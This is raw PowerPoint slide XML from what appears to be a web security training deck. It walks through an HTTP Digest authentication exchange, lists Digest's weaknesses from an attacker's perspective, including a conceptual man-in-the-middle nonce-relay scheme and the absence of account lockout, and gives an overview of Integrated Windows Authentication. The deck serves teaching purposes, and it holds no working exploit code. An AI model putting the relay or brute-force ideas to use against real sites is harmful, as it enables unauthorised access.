            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63495" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="1802844"/>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1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63496" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2590800" y="1650444"/>
            <a:ext cx="4267200" cy="74136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nSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client Request:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>GET  /adminpage/index.html HTTP/1.1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63497" name="Straight Connector 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1981200" y="2564844"/>
            <a:ext cx="5181600" cy="23813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="lg" len="med"/>
            <a:tailEnd type="none" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63498" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2286000" y="2641044"/>
            <a:ext cx="4572000" cy="182973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nSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Server Response:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1 401 Authorization Required</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>WWW-Authenticate: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> realm=secureideas.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>nonce="BgkyFRFdekhyD346xszcd" opaque="000000000"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>stale=false algorithm=MD5 qop="auth"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63499" name="Straight Connector 15"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="1981200" y="4165044"/>
            <a:ext cx="5181600" cy="23813"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40dd-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns="" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:noFill/>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63500" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1143000" y="4876800"/>
            <a:ext cx="401638"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3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63501"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2895600"/>
            <a:ext cx="1371600" cy="2535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3502" name="Oval 75"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7010400" y="3022044"/>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2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63503" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1844710" y="4229646"/>
            <a:ext cx="7239000" cy="19697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nSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Client Request:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="30000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>GET  /adminpage/index.html HTTP/1.1 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Authorization: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>Digest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> username="kevin" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>realm="secureideas.com" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>qop="auth"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>algorithm="MD5" uri="/adminpage/index.html" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>="000001"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>nonce="BgkyFRFdekhyD346xszcd"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t> opaque="000000000"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" i="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
              <a:t>response="fd06468c02e9c2b9495075f7576c6a9d"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"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19075" y="121920"/>
            <a:ext cx="8734425" cy="1175273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s Perspective of</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>HTTP Digest Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
              <a:ea typeface="MS PGothic" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64515" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="411480" y="1615440"/>
            <a:ext cx="8305800" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Digest has no concept of:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Account Lockout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Maximum number of login attempts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Nonce predictability can be a problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>This is rare for most modern web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>No logout functionality unless browser is closed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Man-in-the-Middle attacks, in which an attacker:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Pretends to be a web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Sends request to the real site and retrieves the nonce</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Requests authentication from client, using the nonce from the real site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Passes authentication response to the real site, gaining access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latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Why the Web?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1600200"/>
            <a:ext cx="8991600" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>More and more of our daily lives make use of web applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Originally the web was static brochures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Many of today</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>'s websites have grown significantly more complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Critical business functionality available to employees and possibly even the public across the Internet via portals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Fully functional office suites are being offered via your web browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Web-based administration of critical business applications and even security infrastructures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There is now a much larger attack surface</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>More complexity for attackers to manipulate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Bigger pay-off for bad guys looking to commit fraud, make money, or cause mayhem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a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Integrated Windows Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68611" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="492202" y="1358153"/>
            <a:ext cx="7772400" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Microsoft proprietary authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>IE, Firefox and other browsers support client portion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Uses Windows OS authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Challenge-Response protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>NTLM or Kerberos passed across HTTP or HTTPS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Kerberos is supported as of IIS 5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Typically seen in intranets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>Windows Integrated Authentication requires the client and the server to be in the same or trusted Windows Active Directory domains</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
                <a:ea typeface="MS PGothic" charset="0"/>
              </a:rPr>
              <a:t>There are Apache modules, but they are not widely supported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bwMode="gray">
          <a:xfrm>
            <a:off x="5410200" y="1295400"/>
            <a:ext cx="3581400" cy="304800"/>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400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69634" name="Rectangle 59"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="152400" y="1600200"/>
            <a:ext cx="8991600" cy="4724400"/>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342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69635" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="152400"/>
            <a:ext cx="7772400" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
